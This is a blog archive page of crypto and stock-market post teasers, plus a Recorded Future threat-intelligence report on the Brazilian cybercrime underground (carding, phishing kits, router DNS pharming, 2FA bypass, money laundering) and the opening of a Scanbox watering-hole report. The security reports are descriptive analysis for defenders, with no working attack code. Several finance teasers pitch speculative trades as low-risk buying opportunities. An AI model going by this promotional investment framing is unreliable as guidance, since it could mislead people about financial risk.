Category Archives: Analysis

Small-Cap Surge Continues as Maker (MKR), Basic Attention Token (BAT) and Zcash (ZEC) Lead Rally

The small-cap cryptocurrencies continued to make the most waves on Thursday, offering yet another glimpse of low-risk, high-reward investment opportunities in the digital asset space. The big […]

The post Small-Cap Surge Continues as Maker (MKR), Basic Attention Token (BAT) and Zcash (ZEC) Lead Rally appeared first on Hacked: Hacking Finance.

XMR, XTZ and BAT: These Altcoins are Making the Biggest Moves on Wednesday

The cryptocurrency markets pivoted higher midweek, led by an unlikely combination of privacy coins and small-caps, signaling the continuation of the broad rally that began in February. […]

The post XMR, XTZ and BAT: These Altcoins are Making the Biggest Moves on Wednesday appeared first on Hacked: Hacking Finance.

Pirates of Brazil: Integrating the Strengths of Russian and Chinese Hacking Communities

Insikt Group

Click here to download the complete analysis as a PDF.

Recorded Future’s Insikt Group analyzed advertisements, posts, and interactions within hacking and criminal forums to explore the capabilities, culture, and organization of Brazilian hacking communities. Sources include the Recorded FutureⓇ Platform as well as open web, dark web, and underground forum research.

This report, which is part of a series that started with Russia and China, Japan, and Iran, will be of greatest interest to organizations seeking to understand the criminal underground to better monitor financial vertical and company-specific threats, as well as to those investigating the Brazilian criminal underground.

Executive Summary

Each country’s hackers are unique, with their own codes of conduct, forums, motives and payment methods. Recorded Future’s Portuguese-speaking analysts, with a long-standing background in the Brazilian underground, have analyzed underground markets and forums tailored to the Brazilian Portuguese audience over the past decade and discovered a number of particularities in content hosted on forums, as well as differences in forum organization and conduct.

The primary target of Brazilian hackers is Brazilians. Hackers in Brazil range from the entry-level hackers and security researchers who disclose vulnerabilities in private conferences to black hat hackers who sell illicit products and services. Brazilian hackers are always in search for the next opportunity for easy money. When companies react to their activity by increasing security controls, they move to another business. The abilities of high-level hackers are illustrated through Brazilian law enforcement efforts like Operation Ostentation and the ATM malware by Prilex gang.

Brazilian forums are not necessarily based on web forums. The Chinese underground is more similar to Brazil’s than Russia’s in that way, but Chinese cybercriminals rely on local apps such as QQ and Wechat. The Brazilian forum platform of choice was — and still is — dynamic, changing based on broader social trends and law enforcement efforts. At this time, the forums of choice are WhatsApp and Telegram. Access to Brazilian forums is not as strict as in the Russian-speaking underground. However, because the Brazilian underground is scattered among Telegram and WhatsApp groups, the collection sources are varied. Information in Brazilian forums is not as well organized as in Russian-speaking forums, where threads for products or services are fixed, with well-structured posts with features and pricing.

Key Judgments

  • Carding is strong in the country. There is a strong activity of credit cards generated by algorithms — “geradas” in the local slang. This is not observed by Insikt Group in the other geographies covered by this series, at least not explicitly.
  • Spam, through email, SMS, social media, and messengers — is still one of the primary methods of malware and phishing distribution. Local actors are taking advantage of less strict security mechanisms in SMS to distribute URLs or malware samples.
  • Mass pharming attacks involving vulnerable customer-premises equipment (CPE), observed for the first time in 2014, are still an important method of credentials collection. Typical targets are financial institutions, streaming services, and web hosting companies.
  • Brazilian cybercriminals are not intimidated by two-factor authentication (2FA). While the majority of entry-level hackers move to another activity, high-level hackers insist — and succeed — in bypassing this security control. Techniques observed by Insikt Group include SIM-swap attacks, full compromise of desktops used for internet banking, and hackers’ direct interaction and interference with banking sessions.


Brazilian Communities: Pirate Spirit

Similar to Russian-speaking cybercriminals, Brazilian cybercriminals hold one thing above all else: money. Hacker communities in Brazil differ in their neighborhoods, motivations, goals, and communication platform of choice.

Telegram References on Timeline

Telegram, a very relevant source to Brazil that was recently added to Recorded Future.

Whereas we used “thieves” and “geeks” to define Russian and Chinese undergrounds, respectively, we describe Brazilian hackers as “pirates” because they are not just specialized thieves like the Russian-speaking actors, but are ready to change their TTPs and forum platforms at any time, depending on where the easy money is and what law enforcement and security researchers are doing to collect information on them. At the same time, a very select group of Brazilian cybercriminals resemble their Chinese counterparts, in that they can bypass strict internet banking security controls and ATM security in an impressive way.

History of the Brazilian Underground

Commercial internet was introduced in Brazil between 1995 and 1996. In the late ‘90s, Internet Relay Chat (IRC) networks and ICQ messenger — as well as bulletin board systems (BBS), web-based forums, and chats — became the main chat platforms in Brazil.

IRC channels were the forums of choice for professional hackers in the 2000s and early 2010s. Activity included advertisements of products and services, bulk credit card information, and discussions — none of it organized by topic. For example, IRC servers operated by the groups Silver Lords and FullNetwork — better described as an IRC network than as a group — ruled the underground for years.

“mIRC” — the name of a very popular IRC client that became synonymous of the Brazilian term for IRC client — became very popular among all types of users. Brasirc and Brasnet were the most popular IRC networks, and from its channels emerged some of the first-known threat activity in Brazil: intentional IRC flooding attacks (a kind of denial-of-service attack) against the IRC server host, takeovers of usernames, and coordinated attacks.

IRC protocol was a favorable environment for hacking discussions, with features including controlled access to channels and servers, the ability to grant specific privileges to each user, and bots. At first, hackers met in public IRC networks like Brasirc and Brasnet, but over time they began hosting their own IRC servers. It was harder to find those servers, which gave users and administrators a certain degree of privacy. Just like in special access web forums found in Russian-speaking countries, there was access control. A registered “nick” (nickname) was required to join channels in certain servers and the bot (service) that managed the nicks (NickServ) was not available at all times.

A common area of interest among Brazilian hackers across many groups, skill levels, and motives is penetration testing. This is one of the main topics of most local hacker conferences and entry-level web forums, where tools and tutorials are shared.

In Brazil, website defacement was always one of the main types of hacking activities. Brazilians always were — and still are — one of the top reporters of website defacements to the popular defacement archive zone-h[.]org.

Zone-H Archive

ProtoWave Reloaded group’s verified submissions to Zone-H, a notorious web defacement archive. To date, this Brazilian group has defaced more than 1,250 webpages.

Historically, most Brazilians involved with website defacement were teenagers learning how to exploit software vulnerabilities and badly configured internet-facing systems. Defacement was considered a learning experience in the absence of security frameworks — from reconnaissance to penetration testing and vulnerability exploitation.

From 2005 to the present day, there is still a significant website defacement community in the Brazilian underground, and the motive has evolved from warning administrators to hacktivism. In Brazil, the theme of defacements also corresponds to the current headlines in newspapers: natural disasters, political scandals, and so on.

Some of the most notorious hacker groups of the early 2000s emerged during the IRC era:

  • Website Defacement: Prime Suspectz1, Silver Lords, Insanity Zine, HFury, DataCha0s, Crime Boys
  • Hacking: Unsekurity Scene, or just “unsek,” and its “spin off” groups Clube dos Mercenários (CDM), Front The Scene (FTS)

In the context of hacking, the activity was mainly security research on reconnaissance, penetration testing, and known vulnerability exploitation. Given the limitations of that time — no vast penetration testing literature, frameworks like Metasploit, or tools like Kali Linux — it is possible that some of those researchers began as web defacement actors.

In a series of articles published in 2001, investigative journalist Giordani Rodrigues interviewed the main web defacement groups of that time. In most of them, actors were between 15 and 22 years old. Most likely, that age range has not changed significantly. Actors in that age range tend to act irresponsibly — maturity and ethics are what separate a web defacer who becomes a security professional from one who moves to other outcomes of an intrusion, like data exfiltration or lateral movement.

In 2010, when Anonymous activity began worldwide, the same activity was observed in Brazil. It began as a support to Wikileaks in the second half of 2010, and continues in various forms to the present day. The highest level of Anonymous activity occurred between 2011 and 2015, when most global operations had support from local groups. Targets were mostly political, and distributed denial of service (DDoS) was the primary type of attack. In 2011, Brazilian Federal Police probed the activity of Anonymous in Brazil, as multiple government websites were targets.

Since 2016, groups that claim to support Anonymous’s cause have targets that vary with the headlines of local news and public opinion. Corrupt politicians, companies involved in corruption scandals, candidates in elections, the 2016 Summer Olympics in Rio de Janeiro, the 2014 FIFA World Cup in Brazil — any target or topic is eligible for a local Anonymous campaign. After DDoS attacks became ineffective, the most typical attack became — and still is — leak of breach data. In the past year, Anonymous activity primarily focused on political targets. In the last incident, AnonOpsBR, one of the only groups with recent and recurrent activity, has attacked the Brazilian Ministry of Defense and now president elect Jair Bolsonaro, as well as the vice president.

Organization of the Brazilian Underground

In Brazil, any platform used for interaction could be considered a hacker forum. As we stated before, the typical organization of Russian-speaking criminal underground communities does not apply to what we observe in Brazil, as each forum does not have a singular purpose, nor are they well organized lacking fixed threads for products or services or well structured posts with features and pricing. This makes a big difference in terms of understanding the local underground.

Unlike in Russian-speaking countries, Jabber/XMPP was never a popular chat platform for Brazilian hacker forums. We can state with a high level of confidence that communities of interest jumped from IRC to the modern mobile chat platforms, such as Telegram, WhatsApp, TeamSpeak (gaming), and Discord (gaming), beginning in 2015. Privacy-oriented messengers like Wickr and Signal are more frequently seen in Tor dark web forums and markets.

Orkut, by Google, was the first popular social network in Brazil. From 2004 to 2010, it was the center of the internet — along with the hacking scene — for Brazilians. Private Orkut groups were created for selling hacking products and services. The organization of advertisements was very similar to what we see in Russian-speaking web forums. Around 2010, users started to migrate to Facebook, including the hackers. In 2014, Orkut was discontinued by Google.

The use of social networks for cybercrime shows how unprofessional certain groups of Brazilian hackers are. Any actor from Russian-speaking or Chinese-speaking forums would know that social networks are a risky place to conduct illicit business. The companies who own those networks are generally obliged to cooperate with local authorities, making it easier for law enforcement to investigate and detain hackers.

In Brazil, cybercrime actors started to use Facebook for advertisement as soon as the social network became popular in the country in 2011. Groups were closed, but there was no strict review or vetting process — it was just a matter of requesting access and having it granted.

In 2011, Kaspersky Lab found a website created for hackers to check if another hacker they were doing business with was reliable or a “ripper” (scammer). The service was dubbed “SPC dos Hackers,” which essentially means “Hacker’s Credit Report,” and it was a database of usernames, the contact information associated with each of those usernames, and assessments of those users — positive or negative.

On average, Brazilian cybercriminals from entry to medium level do not demonstrate concerns about operational security (OPSEC) and law enforcement. It is common in the country to see criminals detained for cybercrime only to be released days or weeks later.

Current Landscape

Brazilian web forums do not have a significant role in the Brazilian underground. They never did, and most likely never will. In 2010, the most prominent hacker web forums were essentially the same as the most active ones in 2019: Fórum Hacker and Guia do Hacker. Some forums emerged and were voluntarily taken down in the meantime, like Perfect Hackers, which was taken down in 2018. However, those prominent forums remain the main hacker communities, open to the public. There is no vetting process for registration or paid registration. Anyone can join those forums.

Brazilian web forums are an environment for learning how to become a hacker and the sharing of information and tools. In Brazil, forums have been home to entry-level hackers (script kiddies) since at least 2010. They stay in the forums while it is useful for them to learn hacking methodologies. Camaraderie is praised and encouraged. There are products and services for sale. Mobile forums — specifically, Telegram channels — became the preferred environment to advertise products and services.

More recently, when groups moved to Telegram, it was observed that most of the channels have minimal access control — a defined username is the necessary and sufficient condition to gain access to some channels. Brazilian public Telegram channels are available in the platform.

Telegram Channel Advertisements

Telegram channel with advertisements for phishing kits.

In the screenshot above, the administrator of a Telegram group advertises “telas fake” — a local slang for phishing kits. In this particular case, there are three different types of product: capturing the bank account credentials for 250 BRL (66 USD), capturing basic credit card information for 200 BRL (53 USD) and capturing full credit card information (including name and address) for 150 BRL (40 USD). Cell phone icons indicate the kit is compatible with mobile phones.

Web forums like Forum Hacker and Guia do Hacker are considered by many Brazilians a good way to get immersed in network and information security. The majority of entry-level hackers are not able to enter the white hat and black hat communities in Brazil. This is best shown by the insular, invite-only nature of Brazilian hacker conferences.

Sacicon is another one-day, invite-only conference that has taken place in Sao Paulo since 2012. This conference is similar to YSTS, with a focus on highly technical talks and partying. This conference is promoted by the same organizers of the Hackers to Hackers Conference (H2HC), the first (starting in 2004) and most notorious hacker conference in Brazil. The organizers of Roadsec, a conference targeted at the entry-level security professional or student more than any other audience, also support Sacicon.

You Shot The Sheriff (YSTS), a yearly one-day invite-only hacker conference that has taken place in Sao Paulo since 2007, is similar to DEF CON in terms of content and parallel activities, like lockpicking and hardware hacking. The conference venue is always a bar. Tickets for this conference are rarely sold, but when it happens, the prices are not affordable to most local entry-level professionals or students. This is considered one of the best hacker conferences in Brazil from a security research perspective.

AlligatorCon, which takes place in Recife, PE, Brazil, is an invite-only black hat conference. This conference is similar to Sacicon in its goal to present content with a high technical level, but it goes beyond — topics include vulnerability exploitation, new hacking tools, and zero-day vulnerability disclosures. Unlike Sacicon, this conference focuses exclusively on local research, presented in Brazilian Portuguese.

We have mentioned multiple times where Brazilian hackers are not: in web forums. But where are they? The same places the rest of the Brazilians are. The communication platforms of choice are usually the very same ones used by the local population in general. In the current context, this means WhatsApp, Telegram, and Discord. The last of those is also commonly used by gamers, a result of the dominant teenage demographic in the Brazilian hacking community.

Content in Brazilian Underground Forums


The most common type of software product found in Brazilian web forums is the “crypter,” an obfuscation tool used to pack malicious software in such a way that it goes undetected by antivirus engines. The more “FUD,” or “fully undetectable,” a malware is, the more likely that malware is to reach the user’s email inbox undetected.

This high interest in malware packers is an indicator of one of the main attack vectors of Brazilian cybercriminals: email. Email spam has always been one of the main methods of phishing and malware distribution in Brazil. However, over the years, multiple security controls have increasingly prevented campaigns from reaching victims’ inboxes. Concurrently, new generations changed their relationship with email messaging, and multiple other social media sites and messenger apps emerged and became the primary communication platforms. Cybercriminals had to adapt to those behavioral changes in order to succeed.

The latest quarterly report from the Anti-Phishing Working Group (APWG) shows that phishing campaigns now use paid advertisements in search engines like Google and Bing, social media, rogue mobile apps in official stores, and Smishing (SMS Phishing) to target victims. Many of these attack vectors have ineffective methods for handling spam — SMS in particular — allowing cybercriminals to reach more victims. Even after the malicious link reaches the inbox of a victim, there is still one last phase needed in a successful phishing campaign: the victim must take the bait and click the link. There is a way to not only entice users to click on a phishing link, but also force them to do it technically. That method is known as “pharming.”

Pharming involves the use of malware or technical strategy to subvert the DNS name resolution and force all users of a host or network to visit a known website address at the wrong host (IP address), under the control of the attacker. Pharming is a very common activity of Brazilian hackers. Despite efforts from security companies and internet service providers, occasional attacks are not always detected.

One of the first forms of pharming was local: the attacker would leverage malware to modify the local host address resolution files (“LMHOSTS” for Windows, and “hosts” for Linux). The operating system first checks those files for hostname and IP address pairs. If a bank’s hostname is listed in that file, that resolution has the highest priority. The user visits a website with the correct URL at the wrong server. Local pharming has one weakness: antivirus. Malware can be detected by signature or heuristics, and any application trying to modify the local name resolution file is considered suspicious. Local pharming is convincing because the URL looks legitimate to the victim, but with today’s anti-malware controls, an attacker successfully changing the file with malware is unlikely. DNS or network pharming, on the other hand, does not require the complexity of malware.

Network pharming is an attack vector used by Brazilian cybercriminals since as far back as 2014. At first, the strategy was to abuse customer-premises equipment (CPE) — network routers provided by ISPs. Most users receive the same models or routers from the ISP, making the network environment very predictable. The attack involved sending spam with local network URLs that changed the DNS settings of the local router. Succeeding with this attack method required one favorable condition: a default administrator username and password.

Over time, other strategies were used for exploiting CPEs — exploitation of remote software vulnerabilities, for instance. One of those campaigns, described by Radware in March 2018, involved the exploitation of vulnerabilities in MicroTik routers. In September 2018, 360 Netlab reported two incidents (September 4 and September 29) involving more than 85,000 routers in Brazil. Affected companies involved all major local banks, web hosting companies, and Netflix — a common credential for sale in Telegram channels. Spotify was not among the targeted domain names in those attacks but is a typical target as well. Neither service offers two-factor authentication, which makes credential collection and reuse trivial in this context.

Financial Services Targeting Drives High Security Standards

The Brazilian financial system is very advanced in terms of security controls. This is a result of decades of cybercrime, real-world crime, and — no less important — a response to Brazilians’ consistent malicious activity. Brazil is a hostile environment for the financial vertical in every aspect, and as a result, security standards are high. Hacker activity and developments in the security of the financial system are strongly related, causing the financial institutions to constantly increase the security.

2FA for logins, 2FA for transactions via QR codes, physical tokens, browser plugins that resemble “rootkits,” pre-registration of devices, device fingerprinting, strict limits for wire transfers, pre-registration of wire transfer destination accounts, a dedicated desktop browser for internet banking, and biometry in ATMs are among the vast and ever-growing list of security controls.

Transferring money between Brazilian bank accounts and foreign banks — even within Latin America or MERCOSUR trade bloc — is not trivial. The processing of international payment orders is treated as a currency exchange transaction. As such, additional controls against money laundering and tax evasion are applied, making moving money across country borders harder.

Another important security control relates to credit cards. In most countries, it is necessary to provide basic personal information in card-not-present (CNP) transactions: full name, full address. In Brazil, it is necessary to provide Cadastro de Pessoas Físicas (CPF) — a unique tax ID for every Brazilian citizen in every transaction — and that ID must match the one associated with the credit card. That ID is very similar to a Social Security number (SSN) in the United States. It is considered critical if that information becomes public.

As illustrated above, it’s difficult to move money across country borders and security controls are strict. So how can a cybercriminal thrive in such an environment?

Chip-and-PIN technology was deployed in Brazil in the early 2000s. Just like with any new technology, chip-and-PIN was abused in Brazil, and eventually, cybercriminals succeeded in attacking not the EMV system itself, but poorly implemented deployments.

In March 2018, Kaspersky Lab Brazil released research on malware targeting POS systems with chip-and-PIN (EMV): Prilex. The exploitation of EMV was not something new: other attacks against vulnerable deployments of chip-and-PIN authentication had been seen in the wild over the past few years. The group behind Prilex, which has been active since at least 2015, used many variations of a black box attack, including one involving a Raspberry Pi with 4G data network access capable of exfiltrating data. They also focused on taking control of machine infrastructure. Finally, they added point-of-sale (POS) systems to their attack surface and started targeting chip-and-PIN cards.

Prilex allegedly operates off the limits of web-based forums and social media. According to Kaspersky researchers, they operate their own private WhatsApp groups which are strictly controlled. For that reason, there is no forum activity from Prilex actors in the platform.

Language and Fraud Drive Targets

The primary target of Brazilian hackers is Brazilians. The Portuguese language is key for explaining that observation, but there are other elements that explain this geographical isolation.

There are other Portuguese-speaking countries — Angola, Cape Verde, Guinea-Bissau, Mozambique, Portugal, and Sao Tome and Principe — but there is minimal interaction between these countries and Brazil. The country has its own variation of Portuguese — Brazilian Portuguese — with phonetics and vocabulary that are different from the Portuguese spoken in other countries. That unique Portuguese variation, combined with cultural and economical differences, also isolate Brazil from other countries in South America, as it is surrounded by Spanish-speaking countries.

Most of the products and services in the Brazilian underground are related to personal information: access to credit record databases, full information on a certain individuals provided with a CPF (tax ID) and credentials. Those credentials are obtained in many ways: malware, phishing for financial credentials, phishing for credit checks, Serasa Experian credentials, and insider employees at companies of interest.

Carding, and the products and services surrounding it, like selling credentials, is one of the main activities of closed hacker groups. In the past, information was shared in IRC channels, but now it is present in Telegram and other modern platforms. Carding activity is usually not present in major hacker web forums.

Carding is strong in the country’s underground. Not all credit cards found in the Brazilian underground were necessarily collected. There is strong activity of credit cards generated by algorithms, referred to as “geradas.” They look for companies that don’t validate cards appropriately, which they call “cardeáveis,” or “susceptible to carding,” and exploit them.

In November 2016, Tesco Bank announced a security incident involving 20,000 accounts and a loss of 2.26 million GBP (2.95 million USD). The company issued a new statement a few days later, stating that normal service has resumed. No further information was disclosed in that new statement. In October 2018, Financial Conduct Authority (FCA) released a “Final Notice” on the incident that occurred in 2016. According to the 27-page document, the attackers most likely used an algorithm that generated authentic Tesco Bank debit card numbers. It was determined that the majority of fraudulent transactions were coming from Brazil using a payment method known as “PoS 91,” an industry code which indicated that the attackers were making contactless MSD transactions. Most likely, this is the most notorious example of the impact of Brazilian hacker activity involving generated card numbers.

Currently, there is no personal data protection regulations in place in Brazil. There are plans to implement one — similar to the European Union’s General Data Protection Regulation (GDPR) — but it will not be effective until December 2020. This is bill number 13.709, also known as “Lei Geral de Proteção de Dados,” or LGPD.

At this time, a company that suffers a breach is not obliged to disclose it to the public or the Brazilian government. As a result, companies deny breaches at all costs. In October 2018, Brazilian payment-processing company Stone announced a data breach on the eve of its IPO. It was reported that there was an extortion attempt, though that detail was not confirmed by the company. It could have been cybercriminals or just the competition trying to interfere with the company’s IPO. The same kind of extortion attempt before an IPO happened in April 2018 against financial-tech bank Banco Inter.

Case Study: Law Enforcement Operation Ostentation

One recent Brazilian law enforcement operation, Operation Ostentation, summarizes how a successful cybercrime enterprise in Brazil was carried out. The leader of the gang involved, Pablo Henrique Borges, was arrested on October 11, 2018. According to law enforcement reports and media, he and his gang were able to steal 400 million BRL (about 108 million USD) in 18 months. Borges was 24 years old and was living a life of luxury, with multiple Lamborghinis and Ferraris and expensive trips and habits. Two accomplices were also arrested — Rafael Antonio dos Santos and Matheus Araújo Galvão.

Cars Seized in Operation Ostentation

Cars seized in Operation Ostentation (Operação Ostentação) in October 2018.

The gang would offer to pay people’s bills with up to a 50 percent “discount” via WhatsApp or Facebook posts. This is a common money laundering technique used by Brazilian cybercriminals — instead of cashing out money from bank accounts, they paid for bills, receiving a portion of it in an unconnected account.

It is still unclear how the gang gained access to the bank accounts — more than 23,000 in total — in order to pay for the bills. Most likely, it was with a combination of malware and phishing campaigns. The person responsible for software development was 24-year-old Leandro Xavier Magalhães Fernandes. Also from humble origins — he had a high school degree but no formal education beyond that — he was responsible for the most important element of the gang’s business. His ostentatious lifestyle, with a mansion and expensive cars, attracted attention from the local law enforcement of Goiania, GO.

Unfortunately, no information on handles, the malware family, sample information, or the forum name was released about this gang. Given the background and profile of the two leaders, it is unlikely that they obtained foreign malware for this operation and likely that they developed their own malware.

We do not have further information on this particular law enforcement operation to make statements on the quality of malware that was involved. What we know from other operations and law enforcement opinion is that Brazilian cybercriminals organize themselves in a structure that resembles terrorist groups, not criminal organizations. Gangs are organized into cells — software development, operations, money laundering — in a way that the disruption of one or more cells does not affect the business. Operators are notified when an infected user opens a session and interacts with them to bypass 2FA and other security controls. In March 2016, Kaspersky described this particular type of Remote Access Trojan (RAT) that is common in Brazil.

In Brazil, there are very distinct types of hacker groups: “Lammer” — entry-level hackers in the local slang of web forums — and the legitimate researchers and hackers. Sometimes, hackers evolve from web forums, other times they appear to be completely disconnected from both of these circles. They are simply smart people with basic software development skills who found a niche to explore and a way to make money.


High-level Brazilian hackers will continue to exploit financial institutions, no matter how rigorous the security controls become. Desktop security is sufficiently high, but local cybercriminals have proven that they are capable of successfully bypassing those controls. However, high desktop security does not mean cybercrime is deterred.

The majority of Brazilians no longer do their internet banking on desktops, but on mobile clients. Transfers, one-time passwords, payments — all major banks allow clients to do practically anything using a mobile app. This change in behavior has already motivated change in cybercrime activity. SMS phishing (Smishing), mobile phishing kits, and malicious mobile applications — the majority for Android — pretending to be popular apps, such as WhatsApp, or mobile banking apps have increased in the past few years.

Android exploitation is already a reality in Brazil and this trend continues, as security hardening for those devices is a challenge. Another very important aspect to consider is that many Brazilians — particularly the ones with low income — don’t do internet banking on desktops simply because they don’t even own a desktop or laptop.

Use of WhatsApp in the country remains stable. Most likely, this will continue to be one of the attack vectors for cybercriminals. In 2018, WhatsApp announced and deployed person-to-person payments in India in a feature called WhatsApp Payments. According to WABetaInfo, a news website specializing in WhatsApp news, the feature will be extended to Brazil, Mexico, and the U.K. in the near future. It is highly likely that this feature will be exploited in Brazil.

1Defacements authored by Prime Suspectz archived in Zone-H.

The post Pirates of Brazil: Integrating the Strengths of Russian and Chinese Hacking Communities appeared first on Recorded Future.


Against the Grain: Bitcoin Cash Rises after Binance Delists Bitcoin SV

Bitcoin cash (BCH) advanced on Tuesday, extending a sharp early-week rally that seems to have been triggered by a broad delisting campaign of bitcoin SV (BSV), the […]

The post Against the Grain: Bitcoin Cash Rises after Binance Delists Bitcoin SV appeared first on Hacked: Hacking Finance.

Gold is Losing In Value but Investors Don’t Need Safe Have Assets Right Now

By Dmitriy Gurkovskiy, Chief Analyst at RoboMarkets In the middle of April, gold prices continue falling. The precious metal is currently trading at $1,290.20 per ounce, while […]

The post Gold is Losing In Value but Investors Don’t Need Safe Have Assets Right Now appeared first on Hacked: Hacking Finance.

Litecoin Rallies as Network Hash Rate Approaches All-Time High; More Gains Expected?

Litecoin’s bullish indicators were flashing green on Monday, as the rapid increase in network hash rate signaled growing adoption of the alternative cryptocurrency and paved the way […]

The post Litecoin Rallies as Network Hash Rate Approaches All-Time High; More Gains Expected? appeared first on Hacked: Hacking Finance.

Tezos (XTZ) Re-Tests Yearly Highs as Baking Business Heats Up

Tezos (XTZ), the multi-purpose platform for decentralized applications and smart contracts, climbed double-digits on Sunday to test yearly highs for the second time in two weeks. XTZ […]

The post Tezos (XTZ) Re-Tests Yearly Highs as Baking Business Heats Up appeared first on Hacked: Hacking Finance.

Forget U.S. Stocks; Start Adding Chinese Companies to Your Portfolio

Chinese equities are storming ahead, demonstrating handsome and lucrative returns for investors this year. It may come as somewhat of a surprise for many, given the slowdown […]

The post Forget U.S. Stocks; Start Adding Chinese Companies to Your Portfolio appeared first on Hacked: Hacking Finance.

Crypto Update: Key Support Levels in Focus as Bulls Fight for Control

The cryptocurrency segment settled down following yesterday’s steep and broad drop, with the top coins finding support several times near the long-term levels that stopped the plunge […]

The post Crypto Update: Key Support Levels in Focus as Bulls Fight for Control appeared first on Hacked: Hacking Finance.

Crypto Market Correction Provides Buy-on-the-Dip Opportunity

Cryptocurrency prices corrected sharply lower on Thursday, snapping a multi-week accumulation phase that pushed the overall market to five-month highs. With bitcoin (BTC) and the major altcoins […]

The post Crypto Market Correction Provides Buy-on-the-Dip Opportunity appeared first on Hacked: Hacking Finance.

Crypto Update: Coins Settle Down After Monday Pullback as EOS Shines

The bullish short-term consolidation continues in the cryptocurrency segment, and following Monday’s pullback, volatility declined even further, with the majors settling down in narrow ranges. While the […]

The post Crypto Update: Coins Settle Down After Monday Pullback as EOS Shines appeared first on Hacked: Hacking Finance.

Bitcoin Eyes Another Major Milestone as Technical, Fundamental Forces Unite

Following months of accumulation, the bitcoin (BTC) price may be entering a prolonged bullish phase that mirrors the multi-year rally that began in October 2015 and peaked […]

The post Bitcoin Eyes Another Major Milestone as Technical, Fundamental Forces Unite appeared first on Hacked: Hacking Finance.

EOS Price Analysis: EOS Leads Altcoin Resurgence after Coinbase Listing Announcement

EOS led the cryptocurrency market higher on Wednesday and was poised to overtake bitcoin cash (BCH) in the market cap rankings after Coinbase announced it would extend […]

The post EOS Price Analysis: EOS Leads Altcoin Resurgence after Coinbase Listing Announcement appeared first on Hacked: Hacking Finance.

Boost Your Portfolio with These Oil ETFs Now

Crude oil prices are up a whopping 42% from the start of the year. They have pushed up to their highest levels seen since the very beginning […]

The post Boost Your Portfolio with These Oil ETFs Now appeared first on Hacked: Hacking Finance.

If Just 5% of Cryptocurrency Trade Volume is Real, What Does That Mean for Altcoins?

In late March two sets of research groups released reports detailing their conclusion that a vast majority of cryptocurrency trading volume was fake. Research from TheTie estimated […]

The post If Just 5% of Cryptocurrency Trade Volume is Real, What Does That Mean for Altcoins? appeared first on Hacked: Hacking Finance.

As Global Economy Approaches Crisis Level, Bitcoin Could Be the Answer

Like clockwork, the International Monetary Fund (IMF) has once again slashed its outlook on global economic growth, citing trade tensions, tighter monetary policy and Brexit as the […]

The post As Global Economy Approaches Crisis Level, Bitcoin Could Be the Answer appeared first on Hacked: Hacking Finance.

Why Investors Should Be Paying Attention to Raiden Network

A lot of crypto analysis is centered around competition within the crypto industry, but sometimes there are businesses that have gone out of their way to be […]

The post Why Investors Should Be Paying Attention to Raiden Network appeared first on Hacked: Hacking Finance.

The VIX Tells Us Stocks are Heading for Record Highs; Why Investors Should Be Worried

The U.S. stock market has been nothing short of a roller coaster the past six months. After registering its worst quarterly drop since the Great Recession, the […]

The post The VIX Tells Us Stocks are Heading for Record Highs; Why Investors Should Be Worried appeared first on Hacked: Hacking Finance.

Ethereum Price Analysis: Downward Correction Presents Buying Opportunity

Despite being late to the crypto rally, Ethereum (ETH) put up hefty gains on Wednesday, as the developer’s cryptocurrency catapulted 18% to reach its highest level since […]

The post Ethereum Price Analysis: Downward Correction Presents Buying Opportunity appeared first on Hacked: Hacking Finance.

Crypto Update: Break-Out Continues but Coins Turn Volatile as Litecoin Approaches $100

The unprecedented rally in the cryptocurrency segment continued today, with the overwhelming majority of the top coins surging higher again, and with the relatively strong digital currencies […]

The post Crypto Update: Break-Out Continues but Coins Turn Volatile as Litecoin Approaches $100 appeared first on Hacked: Hacking Finance.

Paytomat (PTI) Sale Goes Live Tomorrow, Following Two-Minute Token Sell-Out

International cryptocurrency exchange EXMO announced just yesterday that the platform’s first IEO (International Exchange Offering) for Paytomat ‘PTI’ concluded successfully, three days before its expected completion date. […]

The post Paytomat (PTI) Sale Goes Live Tomorrow, Following Two-Minute Token Sell-Out appeared first on Hacked: Hacking Finance.

Cardano Price Analysis: ADA Still Undervalued after Flipping USDT

Cardano surged on Wednesday, as the combination of fundamental news, technical progress and a market-wide ‘fear of missing out’ propelled ADA to five-month highs. Despite the year-long […]

The post Cardano Price Analysis: ADA Still Undervalued after Flipping USDT appeared first on Hacked: Hacking Finance.

McAfee: ‘Apollo Currency is a Crypto Game Changer’ – But is APL Worth Your Money?

John McAfee has doubled-down on his Apollo Currency advocacy, saying that APL coin is set to solve the ‘blockchain bloat’ problem when sharding is implemented on April […]

The post McAfee: ‘Apollo Currency is a Crypto Game Changer’ – But is APL Worth Your Money? appeared first on Hacked: Hacking Finance.

Crypto Price Analysis: Bitcoin Showing Striking Similarities With Bullish Cardano

Bitcoin (BTC/USD) has been trading within a tight range between $3,750 and $4,170 for over a month on Bitfinex. The narrow trading range is confusing market participants, […]

The post Crypto Price Analysis: Bitcoin Showing Striking Similarities With Bullish Cardano appeared first on Hacked: Hacking Finance.

The Bulls are Back: Crypto Markets Approach Yearly Highs after Profit-Taking

Crypto markets climbed toward yearly highs Wednesday, as bitcoin (BTC) and its altcoin peers rebounded sharply from a profit-taking-inspired dip earlier in the week. Crypto Markets Surge […]

The post The Bulls are Back: Crypto Markets Approach Yearly Highs after Profit-Taking appeared first on Hacked: Hacking Finance.

Crypto Update: Ripple’s Failed Break-Down Leads to Rally Attempt

Harsh trading conditions continue to dominate the cryptocurrency segment, with still no clear directional momentum. After several days of bearish drift, the majors turned higher in a […]

The post Crypto Update: Ripple’s Failed Break-Down Leads to Rally Attempt appeared first on Hacked: Hacking Finance.

Top 7 Blockchain Stocks to Boost Your Portfolio

Blockchain stocks are ones that you may not want to miss the boat on adding to your portfolio. They have the potential to turn into substantial investments, […]

The post Top 7 Blockchain Stocks to Boost Your Portfolio appeared first on Hacked: Hacking Finance.

Scanbox Watering Hole Targets Pakistani and Tibetan Government Website Visitors

Insikt Group

Click here to download the complete analysis as a PDF.

This report outlines recent Scanbox campaigns targeting a Pakistani government department and the Central Tibetan Administration in early March 2019. Insikt Group researchers utilized data from the Recorded FutureⓇ Platform, Shodan, Farsight Security DNS, third-party network metadata, and common OSINT techniques.

This report will be of most interest to network defenders seeking to understand the threat posed by cyberespionage actors leveraging strategic web compromises to conduct network reconnaissance, in advance of a more concerted effort to gain access to their network.

Executive Summary

In early March 2019, Recorded Future’s Insikt Group identified two separate Scanbox campaigns using strategic web compromises to target visitors to the website of Pakistan’s Directorate General of Immigration and Passports (DGIP) and a spoof of the official Central Tibetan Administration (CTA) website. It is likely that in both cases, the attackers intended to profile the devices of website visitors in order to conduct follow-on intrusions.

